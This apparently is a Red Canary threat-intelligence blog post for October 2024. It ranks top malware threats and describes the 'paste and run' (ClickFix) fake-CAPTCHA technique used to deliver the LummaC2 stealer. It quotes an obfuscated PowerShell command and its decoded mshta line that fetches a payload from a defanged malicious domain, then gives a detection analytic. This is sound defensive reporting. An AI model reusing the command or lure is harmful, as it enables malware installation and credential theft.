Skip Navigation
Get a Demo
 
 
 
 
 
 
 
 
 
Resources Blog Threat intelligence

Intelligence Insights: October 2024

LummaC2 lurks thanks to PowerShell pasting in this month’s edition of Intelligence Insights

The Red Canary Team
Originally published . Last modified .

Highlights from September

ChromeLoader and SocGholish maintained their 1st and 2nd place spots respectively among this month’s top 10 most prevalent threats. Several familiar faces returned to the list, including Amber Albatross in 3rd and Scarlet Goldfinch in 4th. Adload and Raspberry Robin returned as well, in a tie for 10th along with Charcoal Stork.

We continued to see increased LummaC2 activity, even as it dropped in our overall rankings from 4th to 6th. LummaC2 is a popular Malware as a Service (MaaS) stealer currently being used in multiple campaigns

One technique we’ve recently seen lead to LummaC2 involves tricking users into copying a PowerShell script from a pop-up message, pasting it into the Windows Run dialogue box, and executing malicious PowerShell code. Called paste and run by some researchers and ClickFix by others, you can read more about this technique below.

This month’s top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for September 2024:

Month's rankThreat nameThreat description
Month's rank:

➡ 1

Threat name:Threat description:

Malware that modifies victims’ browser settings and redirects user traffic to advertisement websites

Month's rank:

➡ 2

Threat name:Threat description:

Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code

Month's rank:

3

Threat name:Threat description:

Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities

Month's rank:

4

Threat name:Threat description:

Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems

Month's rank:

5

Threat name:Threat description:

Collection of Python classes to construct/manipulate network protocols

Month's rank:

6

Threat name:

LummaC2

Threat description:

Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads

Month's rank:

7

Threat name:Threat description:

Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging

Month's rank:

8*

Threat name:Threat description:

JScript dropper/downloader that typically poses as a document containing an "agreement,” often distributed through search engine redirects

Month's rank:

8*

Threat name:

NetSupport Manager

Threat description:

Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access

Month's rank:

10*

Threat name:

Adload

Threat description:

macOS malware that attempts to hijack and redirect user web browsing traffic

Month's rank:

10

Threat name:Threat description:

Suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper

Month's rank:

10*

Threat name:Threat description:

Activity cluster using a worm spread by external drives that leverages Windows Installer to download malicious files

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Paste and run: when clicks don’t fix

We’ve been observing an initial access technique that tricks users into copying, pasting, and executing malicious PowerShell code. We first saw the technique in August 2024, with other researchers reporting it in use as early as March 2024. Some reports call the technique paste and run, but the most popular name used by the security community for the technique seems to have become ClickFix. ClickFix is a name coined by Proofpoint to initially describe the use of this technique by the ClearFake cluster and TA571. They subsequently expanded the term to refer to the technique as they observed it being used by additional actors. On the Red Canary intel team we tend to refer to the technique in general as paste and run, since not all of the lures involve a “fix” of some kind, and use ClickFix for the activity described by Proofpoint.

Different styles of lures have been reported, including:

  • A phishing lure, where the victim has to copy-paste-run the code to “fix” their access to something, like a document or a video meeting.
  • Via compromised websites with browser injects, posing either as fake CAPTCHAs to access the site or as a page loading error requiring a “fix” to display the page.

To give an example using the fake CAPTCHA style lure, users are presented with the typical Verify You Are Human prompt with an “I’m not a robot” button. Clicking the button silently copies an obfuscated PowerShell command to the clipboard and presents the user with “Verification Steps” instructing them to:

  • Press Windows Button + R (the keyboard shortcut for the Windows Run dialog)
  • Press CTRL + V (to paste the previously copied PowerShell command, which the user likely does not realize was copied)
  • Press Enter (execute the command)

 

An encoded PowerShell command then leverages Microsoft HTML Application Host (mshta.exe) to download and execute a malicious payload from a remote resource, for example:

powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAb

Which decodes to:

mshta "https[:]//clicktogo[.]click/downloads/tra9"

In August 2024 we saw clicktogo[.]click as one of the domains used in a number of these paste and run threat detections, likely attempting to deliver LummaC2 based on our observations and OSINT information. 

Red Canary has observed multiple different payloads delivered via this technique, primarily information stealers. As mentioned, LummaC2 has been the most common payload. We also saw StealC, and an instance of HijackLoader leading to CryptBot. Publicly reported payloads include DarkGate, Rhadamanthys, and Vidar, with some researchers observing a complex multi-layered execution chain delivering three or more payloads.

Security teams may be able to detect this threat by leveraging our oft-shared detection analytic that looks for variations of the PowerShell -encodedcommand switch, but paste and run’s use  of mshta to reach out to remote resources gives us another detection opportunity as well:

 


Detection opportunity: mshta.exe utility making external network connections

This pseudo detection analytic identifies when mshta.exe is used to make external network connections. Adversaries–like those leveraging paste & run–can use mshta.exe to proxy the download and execution of malicious files. Sometimes mshta.exe is used in this way legitimately, so you may need to research the frequency of the command and the reputation of the domain that’s used.

process == (mshta)

&&

deobfuscated_command_line_includes (http: || https:)

 


 

 

 

Intelligence Insights: December 2024

 

Storm-1811 exploits RMM tools to drop Black Basta ransomware

 

Intelligence Insights: November 2024

 

Stealers evolve to bypass Google Chrome’s new app-bound encryption

Subscribe to our blog

 
 
Back to Top